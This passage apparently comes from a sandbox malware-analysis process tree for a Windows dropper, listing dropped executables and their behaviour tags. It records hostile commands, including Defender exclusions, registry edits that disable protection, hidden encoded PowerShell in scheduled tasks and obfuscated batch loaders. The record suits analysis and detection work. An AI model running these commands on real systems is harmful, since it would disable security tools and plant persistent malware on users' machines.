"C:\Users\Admin\AppData\Local\Temp\7zS4BABCD76\Wed18b44c8630.exe" /SILENT
7⤵
- Executes dropped EXE
PID:4472

C:\Users\Admin\AppData\Local\Temp\is-NLCQ4.tmp\Wed18b44c8630.tmp
"C:\Users\Admin\AppData\Local\Temp\is-NLCQ4.tmp\Wed18b44c8630.tmp" /SL5="$60058,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS4BABCD76\Wed18b44c8630.exe" /SILENT
8⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3784

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:6140

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed180cd523402090.exe
4⤵
PID:4136

C:\Users\Admin\AppData\Local\Temp\7zS4BABCD76\Wed180cd523402090.exe
Wed180cd523402090.exe
5⤵
- Executes dropped EXE
PID:4652

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed182283564f1d8.exe /mixone
4⤵
PID:4380

C:\Users\Admin\AppData\Local\Temp\7zS4BABCD76\Wed182283564f1d8.exe
Wed182283564f1d8.exe /mixone
5⤵
- Executes dropped EXE
PID:4976

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4976 -s 624
6⤵
- Program crash
PID:5912

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4976 -s 628
6⤵
- Program crash
PID:2224

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4976 -s 672
6⤵
- Program crash
PID:5064

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4976 -s 812
6⤵
- Executes dropped EXE
- Program crash
PID:4512

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4976 -s 840
6⤵
- Program crash
PID:5344

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4976 -s 888
6⤵
- Program crash
PID:6068

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4976 -s 1052
6⤵
- Program crash
PID:5456

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4976 -s 1060
6⤵
- Program crash
PID:5844

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4976 -s 1364
6⤵
- Program crash
PID:5704

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed18d14c752adf99.exe
4⤵
PID:4328

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed1811682666.exe
4⤵
PID:4288

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed18e6324bbde126d.exe
4⤵
PID:4224

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed18be8c3224a5.exe
4⤵
PID:4192

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed186a2b91bd4e9.exe
4⤵
PID:4168

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed18d947df9c44e3.exe
4⤵
PID:4112

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4052 -s 628
4⤵
- Program crash
PID:5052

C:\Users\Admin\AppData\Local\Temp\7zS4BABCD76\Wed18d947df9c44e3.exe
Wed18d947df9c44e3.exe
1⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
PID:4536

C:\Users\Admin\AppData\Local\Temp\7zS4BABCD76\Wed18e6324bbde126d.exe
Wed18e6324bbde126d.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4688

C:\Users\Admin\AppData\Local\Temp\7zS4BABCD76\Wed18e6324bbde126d.exe
C:\Users\Admin\AppData\Local\Temp\7zS4BABCD76\Wed18e6324bbde126d.exe
2⤵
- Executes dropped EXE
PID:4604

C:\Users\Admin\AppData\Local\Temp\7zS4BABCD76\Wed18d14c752adf99.exe
Wed18d14c752adf99.exe
1⤵
- Executes dropped EXE
PID:4676

C:\Users\Admin\Pictures\Adobe Films\NiceProcessX64.bmp.exe
"C:\Users\Admin\Pictures\Adobe Films\NiceProcessX64.bmp.exe"
2⤵
PID:5676

C:\Users\Admin\Pictures\Adobe Films\Service.exe.exe
"C:\Users\Admin\Pictures\Adobe Films\Service.exe.exe"
2⤵
PID:5532

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
3⤵
- Creates scheduled task(s)
PID:5360

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
3⤵
- Creates scheduled task(s)
PID:5704

C:\Users\Admin\Documents\W3XCasyiOsB1YaWe9s9vplGV.exe
"C:\Users\Admin\Documents\W3XCasyiOsB1YaWe9s9vplGV.exe"
3⤵
PID:4332

C:\Users\Admin\Pictures\Adobe Films\NiceProcessX64.bmp.exe
"C:\Users\Admin\Pictures\Adobe Films\NiceProcessX64.bmp.exe"
4⤵
PID:6972

C:\Users\Admin\Pictures\Adobe Films\mixinte.bmp.exe
"C:\Users\Admin\Pictures\Adobe Films\mixinte.bmp.exe"
4⤵
PID:2740

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2740 -s 424
5⤵
- Program crash
PID:3816

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2740 -s 696
5⤵
- Program crash
PID:6820

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2740 -s 716
5⤵
- Program crash
PID:7544

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2740 -s 716
5⤵
- Program crash
PID:8064

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2740 -s 696
5⤵
- Program crash
PID:7400

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2740 -s 964
5⤵
- Program crash
PID:7228

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2740 -s 988
5⤵
- Program crash
PID:2188

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2740 -s 1344
5⤵
- Program crash
PID:7016

C:\Users\Admin\Pictures\Adobe Films\wMIKZZJ.exe.exe
"C:\Users\Admin\Pictures\Adobe Films\wMIKZZJ.exe.exe"
4⤵
PID:4596

C:\Windows\SysWOW64\TapiUnattend.exe
TapiUnattend
5⤵
PID:7140

C:\Windows\SysWOW64\cmd.exe
cmd /c cmd < Suo.ppam & ping -n 5 localhost
5⤵
PID:6620

C:\Windows\SysWOW64\cmd.exe
cmd
6⤵
PID:6304

C:\Windows\SysWOW64\tasklist.exe
tasklist /FI "imagename eq PSUAService.exe"
7⤵
- Enumerates processes with tasklist
PID:7500

C:\Windows\SysWOW64\find.exe
find /I /N "psuaservice.exe"
7⤵
PID:7344

C:\Windows\SysWOW64\findstr.exe
findstr /V /R "^mIKZUERRcdogxRWVUqrYiUvVLTbpecknKxaeazHqEtakMEgUAbPEdtHFkPhwiIPZyJEZnUCBarxeClouFCIFGHoFMNQDyGTVfaueqgcGVhkhKFrqGivEZpabBYhLrYvMlnNptyu$" Avvelenate.ppam
7⤵
PID:6876

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\Disconosci.exe.pif
Disconosci.exe.pif r
7⤵
PID:8020

C:\Windows\SysWOW64\PING.EXE
ping -n 5 localhost
6⤵
- Runs ping.exe
PID:8152

C:\Users\Admin\Pictures\Adobe Films\d6cc75213b4f19cbc07bb687f4b12dcc.exe.exe
"C:\Users\Admin\Pictures\Adobe Films\d6cc75213b4f19cbc07bb687f4b12dcc.exe.exe"
4⤵
PID:5040

C:\Windows\system32\cmd.exe
/C powershell -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Installoid'
5⤵
PID:6924

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Installoid'
6⤵
PID:5320

C:\Users\Admin\Pictures\Adobe Films\chrome.exe.exe
"C:\Users\Admin\Pictures\Adobe Films\chrome.exe.exe"
4⤵
PID:7048

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 7048 -s 304
5⤵
- Program crash
PID:2012

C:\Users\Admin\Pictures\Adobe Films\utube.bmp.exe
"C:\Users\Admin\Pictures\Adobe Films\utube.bmp.exe"
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:6048

C:\Users\Admin\Pictures\Adobe Films\AjyTbkN.exe.exe
"C:\Users\Admin\Pictures\Adobe Films\AjyTbkN.exe.exe"
4⤵
PID:4740

C:\Users\Admin\Pictures\Adobe Films\setup331.exe.exe
"C:\Users\Admin\Pictures\Adobe Films\setup331.exe.exe"
4⤵
PID:5392

C:\Users\Admin\Pictures\Adobe Films\B2BCH2.exe.exe
"C:\Users\Admin\Pictures\Adobe Films\B2BCH2.exe.exe"
4⤵
PID:2012

C:\Users\Admin\AppData\Local\Temp\is-SPL1H.tmp\B2BCH2.exe.tmp
"C:\Users\Admin\AppData\Local\Temp\is-SPL1H.tmp\B2BCH2.exe.tmp" /SL5="$603C0,254182,170496,C:\Users\Admin\Pictures\Adobe Films\B2BCH2.exe.exe"
5⤵
PID:6648

C:\Users\Admin\AppData\Local\Temp\is-D5QLP.tmp\djkdj778_______.exe
"C:\Users\Admin\AppData\Local\Temp\is-D5QLP.tmp\djkdj778_______.exe" /S /UID=91
6⤵
PID:7840

C:\Users\Admin\Pictures\Adobe Films\setup331.exe.exe
"C:\Users\Admin\Pictures\Adobe Films\setup331.exe.exe"
2⤵
PID:2472

C:\Windows\SysWOW64\control.exe
"C:\Windows\System32\control.exe" "C:\Users\Admin\AppData\Local\Temp\DDDBX.cpL",
3⤵
PID:5352

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\DDDBX.cpL",
4⤵
PID:5580

C:\Windows\system32\RunDll32.exe
C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\DDDBX.cpL",
5⤵
PID:6624

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 "C:\Users\Admin\AppData\Local\Temp\DDDBX.cpL",
6⤵
PID:6688

C:\Users\Admin\Pictures\Adobe Films\Fenix.bmp.exe
"C:\Users\Admin\Pictures\Adobe Films\Fenix.bmp.exe"
2⤵
PID:5036

C:\Users\Admin\Pictures\Adobe Films\911.bmp.exe
"C:\Users\Admin\Pictures\Adobe Films\911.bmp.exe"
2⤵
PID:4868

C:\Users\Admin\Pictures\Adobe Films\911.bmp.exe
"C:\Users\Admin\Pictures\Adobe Films\911.bmp.exe" -hq
3⤵
PID:5040

C:\Users\Admin\Pictures\Adobe Films\newfile.exe.exe
"C:\Users\Admin\Pictures\Adobe Films\newfile.exe.exe"
2⤵
PID:5644

C:\Users\Admin\Pictures\Adobe Films\wam_3.bmp.exe
"C:\Users\Admin\Pictures\Adobe Films\wam_3.bmp.exe"
2⤵
PID:5692

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\SETUP_~2.EXE
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\SETUP_~2.EXE
3⤵
PID:6032

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMwA1AA==
4⤵
PID:6280

C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
4⤵
PID:7440

C:\Users\Admin\Pictures\Adobe Films\bezon.bmp.exe
"C:\Users\Admin\Pictures\Adobe Films\bezon.bmp.exe"
2⤵
PID:1028

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1028 -s 852
3⤵
- Program crash
PID:7972

C:\Users\Admin\Pictures\Adobe Films\Mixruzki1.bmp.exe
"C:\Users\Admin\Pictures\Adobe Films\Mixruzki1.bmp.exe"
2⤵
PID:5080

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5080 -s 216
3⤵
- Program crash
PID:6044

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5080 -s 700
3⤵
- Program crash
PID:3704

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5080 -s 740
3⤵
- Program crash
PID:5856

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5080 -s 740
3⤵
- Program crash
PID:6544

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5080 -s 808
3⤵
- Program crash
PID:7040

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5080 -s 956
3⤵
- Program crash
PID:6400

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5080 -s 992
3⤵
- Program crash
PID:5136

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5080 -s 1336
3⤵
- Program crash
PID:4264

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5080 -s 1352
3⤵
- Program crash
PID:7508

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im "Mixruzki1.bmp.exe" /f & erase "C:\Users\Admin\Pictures\Adobe Films\Mixruzki1.bmp.exe" & exit
3⤵
PID:7172

C:\Windows\SysWOW64\taskkill.exe
taskkill /im "Mixruzki1.bmp.exe" /f
4⤵
- Kills process with taskkill
PID:5932

C:\Users\Admin\Pictures\Adobe Films\6523.exe.exe
"C:\Users\Admin\Pictures\Adobe Films\6523.exe.exe"
2⤵
PID:4312

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4312 -s 304
3⤵
- Program crash
PID:5084

C:\Users\Admin\Pictures\Adobe Films\00.bmp.exe
"C:\Users\Admin\Pictures\Adobe Films\00.bmp.exe"
2⤵
PID:2324

C:\Users\Admin\Pictures\Adobe Films\Bandicam.bmp.exe
"C:\Users\Admin\Pictures\Adobe Films\Bandicam.bmp.exe"
2⤵
PID:1504

C:\Users\Admin\Pictures\Adobe Films\TrdngAnr6339.exe.exe
"C:\Users\Admin\Pictures\Adobe Films\TrdngAnr6339.exe.exe"
2⤵
PID:2528

C:\Users\Admin\Pictures\Adobe Films\TrdngAnr6339.exe.exe
"C:\Users\Admin\Pictures\Adobe Films\TrdngAnr6339.exe.exe"
3⤵
PID:4684

C:\Users\Admin\AppData\Local\Temp\08GEB05163E27DH.exe
4⤵
PID:6288

C:\Users\Admin\AppData\Local\Temp\5L9I4748C6FJ8DM.exe
4⤵
PID:4328

C:\Users\Admin\AppData\Local\Temp\C2I51M1BF7974J1.exe
4⤵
PID:4924

C:\Users\Admin\Pictures\Adobe Films\d6cc75213b4f19cbc07bb687f4b12dcc.exe.exe
"C:\Users\Admin\Pictures\Adobe Films\d6cc75213b4f19cbc07bb687f4b12dcc.exe.exe"
2⤵
PID:5128

C:\Users\Admin\AppData\Local\Temp\7zS4BABCD76\Wed186a2b91bd4e9.exe
Wed186a2b91bd4e9.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4664

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
2⤵
PID:5672

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
3⤵
- Kills process with taskkill
PID:6140

C:\Users\Admin\AppData\Local\Temp\7zS4BABCD76\Wed1811682666.exe
Wed1811682666.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4572

C:\Users\Admin\AppData\Local\Temp\7zS4BABCD76\Wed18be8c3224a5.exe
Wed18be8c3224a5.exe
1⤵
- Executes dropped EXE
PID:4784

C:\Users\Admin\AppData\Local\Temp\7zS4BABCD76\Wed18be8c3224a5.exe
"C:\Users\Admin\AppData\Local\Temp\7zS4BABCD76\Wed18be8c3224a5.exe" -u
2⤵
- Executes dropped EXE
PID:5144

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4052 -ip 4052
1⤵
PID:4820

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 4976 -ip 4976
1⤵
PID:5832

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 4976 -ip 4976
1⤵
PID:5208

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
1⤵
- Process spawned unexpected child process
PID:348

C:\Windows\SysWOW64\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
2⤵
PID:3952

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3952 -s 600
3⤵
- Program crash
PID:5360

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 3952 -ip 3952
1⤵
PID:5372

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 4976 -ip 4976
1⤵
PID:4432

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 4976 -ip 4976
1⤵
PID:3888

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 4976 -ip 4976
1⤵
PID:4436

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 4976 -ip 4976
1⤵
PID:5268

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 4976 -ip 4976
1⤵
PID:4692

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 4976 -ip 4976
1⤵
PID:5848

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 4976 -ip 4976
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:4440

C:\Windows\system32\cmd.exe
/C powershell -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Installoid'
1⤵
PID:5372

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Installoid'
2⤵
PID:2528

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 4728 -ip 4728
1⤵
PID:3660

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 5080 -ip 5080
1⤵
PID:4784

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 4312 -ip 4312
1⤵
PID:6048

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 4728 -ip 4728
1⤵
PID:4232

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 5080 -ip 5080
1⤵
PID:4304

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 4728 -ip 4728
1⤵
PID:4680

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 5080 -ip 5080
1⤵
PID:4676

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 4728 -ip 4728
1⤵
PID:6396

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 5080 -ip 5080
1⤵
PID:6424

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 4728 -ip 4728
1⤵
PID:6828

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",global
1⤵
- Process spawned unexpected child process
PID:6840

C:\Windows\SysWOW64\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",global
2⤵
PID:6860

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6860 -s 608
3⤵
- Program crash
PID:7088

C:\Windows\SysWOW64\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",global
1⤵
PID:6932

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6932 -s 600
2⤵
- Program crash
PID:7112

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 5080 -ip 5080
1⤵
PID:6920

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 6860 -ip 6860
1⤵
PID:7000

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 596 -p 6932 -ip 6932
1⤵
PID:7048

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",global
1⤵
- Process spawned unexpected child process
PID:6900

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 4728 -ip 4728
1⤵
PID:5788

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 5080 -ip 5080
1⤵
PID:3448

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 4728 -ip 4728
1⤵
PID:2296

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 5080 -ip 5080
1⤵
PID:6944

C:\Windows\SysWOW64\TapiUnattend.exe
TapiUnattend
1⤵
PID:3840

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 6768 -ip 6768
1⤵
PID:4476

C:\Windows\SysWOW64\cmd.exe
cmd /c cmd < Camminato.xla & ping -n 5 localhost
1⤵
PID:6900

C:\Windows\SysWOW64\cmd.exe
cmd
2⤵
PID:664

C:\Windows\SysWOW64\tasklist.exe
tasklist /FI "imagename eq PSUAService.exe"
3⤵
- Enumerates processes with tasklist
PID:7936

C:\Windows\SysWOW64\find.exe
find /I /N "psuaservice.exe"
3⤵
- Executes dropped EXE
PID:5416

C:\Windows\SysWOW64\findstr.exe
findstr /V /R "^XufIWpJvRqjcIeFiHQtYxsuHNiySwUYnVemDyijdsqGlBBEcpYOSjQXFZIVPtQcWeNAGDwwADOHxLWykDKJryujytTDvkbkAEJiOwYSo$" Nemica.xla
3⤵
PID:8084

C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\Plasmare.exe.pif
Plasmare.exe.pif J
3⤵
PID:5108

C:\Windows\SysWOW64\PING.EXE
ping localhost -n 5
3⤵
- Runs ping.exe
PID:5520

C:\Windows\SysWOW64\PING.EXE
ping -n 5 localhost
2⤵
- Runs ping.exe
PID:7972

C:\Windows\SysWOW64\control.exe
"C:\Windows\System32\control.exe" "C:\Users\Admin\AppData\Local\Temp\DDDBX.cpL",
1⤵
PID:6864

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\DDDBX.cpL",
2⤵
PID:5824

C:\Windows\system32\RunDll32.exe
C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\DDDBX.cpL",
3⤵
PID:8100

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 "C:\Users\Admin\AppData\Local\Temp\DDDBX.cpL",
4⤵
PID:8160

C:\Users\Admin\AppData\Local\Temp\7zSA587.tmp\Install.exe
.\Install.exe
1⤵
PID:4708

C:\Users\Admin\AppData\Local\Temp\7zSB6AD.tmp\Install.exe
.\Install.exe /S /site_id "525403"
2⤵
PID:6264

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
3⤵
PID:7412

C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
4⤵
PID:7704

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
5⤵
PID:7992

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
5⤵
PID:8152

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
3⤵
PID:7180

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gDYHLsNNE" /SC once /ST 05:35:16 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
3⤵
- Creates scheduled task(s)
PID:8076

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gDYHLsNNE"
3⤵
PID:7780

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gDYHLsNNE"
3⤵
PID:7056

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "bKqtUhAckstRmOkXqo" /SC once /ST 13:05:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\GDRPYdOHWOMIRVQbw\bnDAWlqtvsqsVUM\bPmBaKN.exe\" hO /site_id 525403 /S" /V1 /F
3⤵
- Creates scheduled task(s)
PID:8052

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 384 -p 2740 -ip 2740
1⤵
PID:4832

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 7048 -ip 7048
1⤵
PID:4364

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 624 -p 5080 -ip 5080
1⤵
PID:5784

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 4728 -ip 4728
1⤵
PID:5932

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 6768 -ip 6768
1⤵
PID:5968

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 6768 -ip 6768
1⤵
PID:4396

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 2740 -ip 2740
1⤵
PID:5736

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 6768 -ip 6768
1⤵
PID:2296

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 4728 -ip 4728
1⤵
PID:7272

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 5080 -ip 5080
1⤵
PID:7320

